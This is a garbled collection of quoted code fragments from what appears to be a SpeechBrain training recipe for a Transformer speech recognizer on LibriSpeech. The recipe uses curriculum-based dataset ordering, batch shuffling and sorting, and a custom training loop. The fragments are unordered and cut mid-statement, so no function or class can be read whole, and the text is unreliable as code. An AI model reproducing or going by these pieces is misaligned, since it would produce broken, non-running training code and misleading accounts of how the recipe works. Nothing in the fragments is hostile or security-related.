\"\"\" def __init__(", "= make_dataloader( # valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # )", "= valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]:", "key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False", "(parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory(", "--------- modules : dict of str:torch.nn.Module pairs These modules are passed to the", "feedback from model and reshuffles the dataset. By, default, it is False sortagrad:", "0: # gradient clipping & early stop if loss is not fini self.check_gradients(loss)", "match the use case. For a simple use case (e.g., training a single", "options to change the runtime environment, including debug (bool) If ``True``, this will", "SummaryWriter import sys import logging from pathlib import Path import speechbrain as sb", "default if they have trainable parameters, and will have ``train()``/``eval()`` called on them.", "weights[id] = index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two", "(bool) Whether to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount", "datasets to be used in the brain class. It also defines the data", "them. opt_class : torch.optim class A torch optimizer constructor that has takes only", "as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group", "librispeech. The system employs an encoder, a decoder, and an attention mechanism between", "to run in debug mode, Default ``2``. debug_epochs (int) Number of epochs to", "len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone", "= stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval", "# # print(batch.duration) # # print(batch.wrd) # # if cnt == 5: #", "only keep (at most) the first n filtered data_points. The possible sorting is", "self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not", "# Load latest checkpoint to resume training if interrupted if self.checkpointer is not", "parameters given a single batch in input\"\"\" # check if we need to", "using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset(", "\"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start() # if the model", "a progressbar. 
\"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set", "None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup", "If distributed_launch=True then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) #", "overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"],", "self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer", "index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points", "reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for", "and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step,", "compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\"", "modules to a set of data. In order to use the ``fit()`` method,", "valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): # keys are test_clean, test_other", "length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight *", "= self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode only", "target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute", "of the ``fit()`` method, which iterates epochs and datasets for the purpose of", "class abstracts away the details of data loops. The primary purpose of the", ") self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar", "broken using ``output_length`` in descending order Note: This is used only if `weights`", "return the result if res == 0: continue else: return res return res", "averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets", "dynamic items) to limit, will only keep data_point if data_point[key] <= limit key_test", "w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the end of the evaluation", "return 1 elif text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain):", "train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the system employs", "AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps,", "= index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the", "filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills", "\"\"\" # ordering type can be random, sorted # keys for ordering info", "for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. 
Activate it only with CUDA.
Meant for debugging.
otherwise shuffling in the DataLoader undoes the sort
run_opts : dict
    A set of options to change the runtime environment, including
\"\"\" if not ( isinstance(train_set,", "<NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard import SummaryWriter import sys", "loss = ( self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq )", "self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar = not", "speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from", "shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage", "== sb.Stage.TEST ): # Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\"", "loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation", "return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test", "= Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\"", "need to compute the dynamic items twice. Arguments --------- key_min_value : dict Map", "max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader( # valid_data ,", "The decoder is based on a Transformer decoder. Beamsearch coupled with a Transformer", "self.modules.Transformer( src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits", "``15.0``. If non-positive, these are not saved. checkpointer : speechbrain.Checkpointer By default, this", "used as basic recognition tokens. Training is performed on the full LibriSpeech dataset", "== sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs = torch.cat([wavs, wavs_noise],", "reverse=False ): \"\"\"Returns a list of data ids, filtered and sorted using custom", "import os import torch from torch.utils.tensorboard import SummaryWriter import sys import logging from", "for training a Transformer ASR system with librispeech. The system employs an encoder,", "to create final dataset batch_size : 8, int Used to divide the dataset", "only iterate a few batches for all datasets, to ensure code runs without", "used. Activate it only with cuda. max_grad_norm (float) Default implementation of ``fit_batch()`` uses", "else: if self.sortagrad != -1: # number of epochs for which curriculum must", "is a Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid.", "= index return weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle", "when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] # 2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\")", ") return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file,", "batch_size : 8, int Used to divide the dataset into batches. 
This helps in ordering the dataset at the batch level.
For a simple use case (e.g., training a single model with a single
dataset), the only methods that need to be overridden are
``compute_forward()`` and ``compute_objectives()``. The example below
illustrates how overriding these two methods is done.
The following methods are used and expected to have a certain behavior:
It can take one of the following values (see the sketch below):

    * ``-1`` - use curriculum learning for all epochs
    * ``n`` - use curriculum learning only for the first ``n`` epochs,
      then fall back to random shuffling
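A minimal sketch of the gating this implies, mirroring the check in
``recreate_train_dataset`` (the helper name is illustrative, not part
of the class)::

    def curriculum_active(sortagrad, epoch):
        # -1 keeps the curriculum ordering for every epoch; otherwise
        # it is used only while epoch <= sortagrad, after which the
        # recipe falls back to random shuffling.
        return sortagrad == -1 or epoch <= sortagrad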
valid_loader_kwargs : dict
    Kwargs passed to ``make_dataloader()`` for making the valid_loader
    (if ``valid_set`` is a Dataset, not a DataLoader), e.g. batch_size,
    num_workers; all DataLoader kwargs are valid.
By properly changing the parameter files, you can try different models,
tokens (e.g., characters instead of BPE), and training splits (e.g.,
train-clean-100 rather than the full one), among many other possible
variations.
For more complicated use cases, such as multiple modules that need to
be updated, the following methods can be overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``
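A minimal sketch of the simple case (the module and data below are
placeholders, not part of this recipe)::

    import torch
    import speechbrain as sb

    class SimpleBrain(sb.Brain):
        def compute_forward(self, batch, stage):
            # Run the single module on the input tensor.
            return self.modules.model(batch[0])

        def compute_objectives(self, predictions, batch, stage):
            # Any differentiable loss works for illustration.
            return torch.nn.functional.l1_loss(predictions, batch[0])

    model = torch.nn.Linear(in_features=10, out_features=10)
    brain = SimpleBrain(
        modules={"model": model},
        opt_class=lambda params: torch.optim.SGD(params, lr=0.1),
    )
    brain.fit(range(1), ([torch.rand(10, 10), torch.rand(10, 10)],))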
By default, this will be passed all modules in ``modules`` at the
beginning of the ``fit()`` method; for example,
``opt_class=lambda params: torch.optim.Adam(params, lr=1e-3)``
constructs an Adam optimizer over those parameters. This behavior can
be changed by overriding the ``configure_optimizers()`` method.
The reason to implement these operations in the same method is that
sorting and filtering are both expensive, and this way the filtering
and sorting steps don't need to compute the dynamic items twice.
train_set : Dataset, DataLoader
    A set of data to use for training. If a Dataset is given, a
    DataLoader is automatically created. If a DataLoader is given, it
    is used directly.
Returns
-------
FilteredSortedDynamicItemDataset
    Shares the static data, but has its own output keys and dynamic
    items (initially deep-copied from this, so they have the same
    dynamic items available).
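A usage sketch under this recipe's assumptions (``train_data`` already
built as a curriculum-capable DynamicItemDataset; key names follow the
Arguments above)::

    train_data = train_data.curriculum_based_filtered_sorted(
        key_min_value={"duration": 1.0},  # drop clips shorter than 1 s
        ordering_info="input_length:asc,output_length:desc",
        batch_selection="random",  # keep batches intact, shuffle their order
        batch_size=8,
    )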
The system employs an", "weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights == None: # Create", "of epochs for which curriculum must be used is defined if self.sortagrad <", "interrupted if self.checkpointer is not None: # do not reload the weights if", "Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0", "audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)", "\"wrd\", \"tokens_bos\", \"tokens_eos\", \"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__ ==", "data to speed up training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\")", "stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if", "progressbar is None: progressbar = not self.noprogressbar # Iterate epochs for epoch in", "index return weights def _custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data", "is used to handle , whether the dataset needs to be reshuffled at", "p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage == sb.Stage.TRAIN:", "epoch_stats = { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats(", "epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a", "the list of parameters (e.g. a lambda or partial function definition). By default,", "# Only run validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end,", "order # If comparison using `key` returned data points as equal, continue #", "in weights.items(): if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and value", "epochs to run in debug mode, Default ``2``. If a non-positive number is", "`weights` is None batch_selection : str Information on how to order batches. -", "return loss.detach() def on_stage_start(self, stage, epoch): \"\"\"Gets called at the beginning of each", "the evaluation stage # delete the rest of the intermediate checkpoints # ACC", "tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We download", "False # elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True", "will only keep data_point if bool(func(data_point[key])) == True min_weight : None, int If", "the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc,", "epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of epochs for", "Dataset, not DataLoader). E.G. batch_size, num_workers. DataLoader kwargs are all valid. valid_loader_kwargs :", "False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids", "data to use for validation. 
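    # Illustrative sketch of how a curriculum dataset might be built with
    # the method above. The CSV path is a placeholder; the method name and
    # its arguments are the real ones documented above:
    #
    #   train_data = CurriculumOrientedDynamicDataset.from_csv(
    #       csv_path="train.csv"
    #   )
    #   train_data = train_data.curriculum_based_filtered_sorted(
    #       ordering_info="input_length:asc,output_length:desc",
    #       batch_selection="random",
    #       batch_size=8,
    #   )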
    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns a list of data ids fulfilling the filtering criteria"""

        def combined_filter(computed):
            """Checks if the data example fulfills the filtering criteria"""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(computed):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids

    def _weighted_filtered_sorted_ids(
        self,
        weights,
        min_value=None,
        max_value=None,
        select_n=None,
        reverse=False,
    ):
        """Returns a list of data ids, filtered and sorted using custom
        weights"""

        def weights_filter(weights, min_value, max_value):
            """Checks if the data example has weight within the range
            (`min_value`, `max_value`)"""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # iterate over a copy of the items: popping from a dict while
            # iterating over it raises a RuntimeError
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(filtered_weights.keys()):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((weights[data_id], i, data_id))
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ]
        return filtered_sorted_ids

    def _parse_dataset_order(self, dataset_order=""):
        """Takes in `ordering_info` as a string and parses it into a list
        of {"key": ..., "order": ...} dicts."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info
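    # For example, _parse_dataset_order("input_length:asc,output_length:desc")
    # returns:
    #   [{"key": "input_length", "order": "asc"},
    #    {"key": "output_length", "order": "desc"}]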
    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids in random order"""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weightages for data_ids"""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        weights = {}
        for index, id in enumerate(shuffled_ids):
            weights[id] = index
        return weights

    def _random_shuffled_batches(self, weights=None, batch_size=8, reverse=False):
        """Randomly shuffle the dataset at batch level"""
        # place each data id at its weight index so batches are built on the
        # weight-ordered list
        data_ids = list(weights.keys())
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise shuffling gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights, batch_size):
        """Reverse sort the dataset at batch level"""
        # place each data id at its weight index so batches are built on the
        # weight-ordered list
        data_ids = list(weights.keys())
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise sorting gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights
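    # Worked example of the batch arithmetic above (values made up): with
    # 10 items and batch_size=4 there are ceil(10 / 4) = 3 batches covering
    # indexes [0:4], [4:8], [8:10]. A permutation such as (2, 0, 1) then
    # emits the ids in the order [8:10] + [0:4] + [4:8], and fresh weights
    # are assigned from the new positions.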
    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create `weights` for data points using `ordering_info`"""

        def compare(key1, key2):
            """Comparing logic, as `ordering_info` can contain multiple keys
            Note: Value and its meaning
             *  1 - key1 > key2
             * -1 - key1 < key2
             *  0 - key1 = key2
            """
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res *= order
                # If comparison using `key` returned data points as equal,
                # continue to the next key, else return the result
                if res == 0:
                    continue
                else:
                    return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, id in enumerate(sorted_data_ids):
            weights[id] = index
        return weights

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length"""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length"""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order"""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0
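    # Illustrative sketch of the tie-breaking above (the method and key
    # names are real, the data values are made up): with
    #   dataset_orderings = [{"key": "input_length", "order": "asc"},
    #                        {"key": "output_length", "order": "desc"}]
    # two utterances with equal "duration" compare as 0 on the first key,
    # so the (negated, because "desc") comparison of their "wrd" lengths
    # decides their relative order.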
- Format : \"<key1>:<order1>,<key2>:<order2>,........\" - Options for keys: `input_length`, `output_length`,", "progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and datasets to improve objective. Relies on", "# valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with", "= self.hparams.lr_sgd steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch,", "return False for key, func in key_test.items(): if bool(func(computed[key])): continue return False return", "0 # Validation stage if valid_set is not None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss", "the path given in the YAML file). The tokenizer is loaded at the", "if training enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched", "in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name]", "sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss / self.hparams.gradient_accumulation).backward() if self.step", ") # when sorting do not shuffle in dataloader ! otherwise is pointless", "\"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], )", "= 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs", "return -1 else: return 0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two", "data example has weight within the range (`min_value`, `max_value`)\"\"\" if min_value == None", "attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection =", "train-clean 100 rather than the full one), and many other possible variations. Authors", "DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar : bool Whether", ") ordering_info = hparams[\"ordering\"] batch_selection = hparams[\"batch_selection\"] batch_size = int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted(", "_random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids in random order\"\"\" return np.random.permutation(data_ids) def", "called at the end of a epoch. This is used to handle ,", "to limit, will only keep data_point if data_point[key] >= limit key_max_value : dict", "* ``compute_forward()`` * ``compute_objectives()`` The example below illustrates how overriding these two methods", "DataLoader from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time def make_dataloader(", "\"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the datasets objects as well", "data_point[key] >= limit key_max_value : dict Map from key (in data or in", "minutes, default: ``15.0``. If non-positive, these are not saved. 
checkpointer : speechbrain.Checkpointer By", "loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode", "break if ( self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time()", "sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0", "and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if", "): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for data_id", "we create the datasets objects as well as tokenization and encoding train_data, valid_data,", "set of data to use for training. If a Dataset is given, a", "be reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad !=", "checkpoints, in minutes, default: ``15.0``. If non-positive, these are not saved. checkpointer :", "> python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the", "modules are passed to the optimizer by default if they have trainable parameters,", "random, sorted, weighted_sorted.\" ) # order batchwise if batch_selection == \"contiguous\": pass elif", "None: self.on_stage_start(Stage.VALID, epoch) self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm(", "str) List of keys in ``modules`` that should be jit compiled. distributed_count (int)", "p_ctc = self.hparams.log_softmax(logits) # output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq", "takes only the list of parameters (e.g. a lambda or partial function definition).", "self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder +", "key == \"input_length\": res = self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2)", "`input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc` - Example: * \"input_length:asc,output_length:desc\"", "\"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be one", "100 rather than the full one), and many other possible variations. Authors *", "we only perform beamsearch with limited capacity # and no LM to give", "in dynamic items) to func, will only keep data_point if bool(func(data_point[key])) == True", "Arguments --------- modules : dict of str:torch.nn.Module pairs These modules are passed to", "on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the end of a epoch.\"\"\" #", "and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) *", "lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage):", "non-positive, these are not saved. 
checkpointer : speechbrain.Checkpointer By default, this will be", "descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\")", "filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in string as input", "keys and dynamic items (initially deep copied from this, so they have the", "FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns", "the same dynamic items available) \"\"\" # ordering type can be random, sorted", "# # when sorting do not shuffle in dataloader ! otherwise is pointless", "if self.sortagrad < epoch: # recreate dataset using random shuffling return else: #", "following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters,", "= os.path.join( hparams[\"output_folder\"], \"wer_{}.txt\".format(k) ) with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) #", "n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static", "``configure_optimizers()`` method. hparams : dict Each key:value pair should consist of a string", "data to use for training. If a Dataset is given, a DataLoader is", "self, filtered_sorted_ids ) def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a", "continue return False return True temp_keys = ( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys())", "key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2)", ": dict Each key:value pair should consist of a string key and a", "to be updated, the following methods can be overridden: * ``fit_batch()`` * ``evaluate_batch()``", "+ (1 - self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch =", "and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in", "= self.compute_objectives(predictions, batch, sb.Stage.TRAIN) # normalize the loss by gradient_accumulation step (loss /", "= self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer", "return else: # recreate dataset using preferred cl approach return else: # recreate", "int(hparams[\"batch_size\"]) train_data = train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not", "order\"\"\" return np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\"", "= self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage == sb.Stage.TEST", "+ (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos tokens =", "simple use case (e.g., training a single model with a single dataset) the", "specified if stage == sb.Stage.TRAIN: if hasattr(self.modules, \"env_corrupt\"): wavs_noise = self.modules.env_corrupt(wavs, wav_lens) wavs", "based 
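    # Illustrative construction sketch: the hparams keys "ordering" and
    # "batch_selection" are the real ones read above; "modules", "Adam" and
    # "checkpointer" follow the standard LibriSpeech recipe YAML and are
    # assumptions here:
    #
    #   asr_brain = ASR(
    #       modules=hparams["modules"],
    #       opt_class=hparams["Adam"],
    #       hparams=hparams,
    #       run_opts=run_opts,
    #       checkpointer=hparams["checkpointer"],
    #       inter_epoch_dataset_updation=False,
    #       sortagrad=-1,
    #   )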
    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos
        # Add augmentation if specified
        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)
        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)
        # forward modules
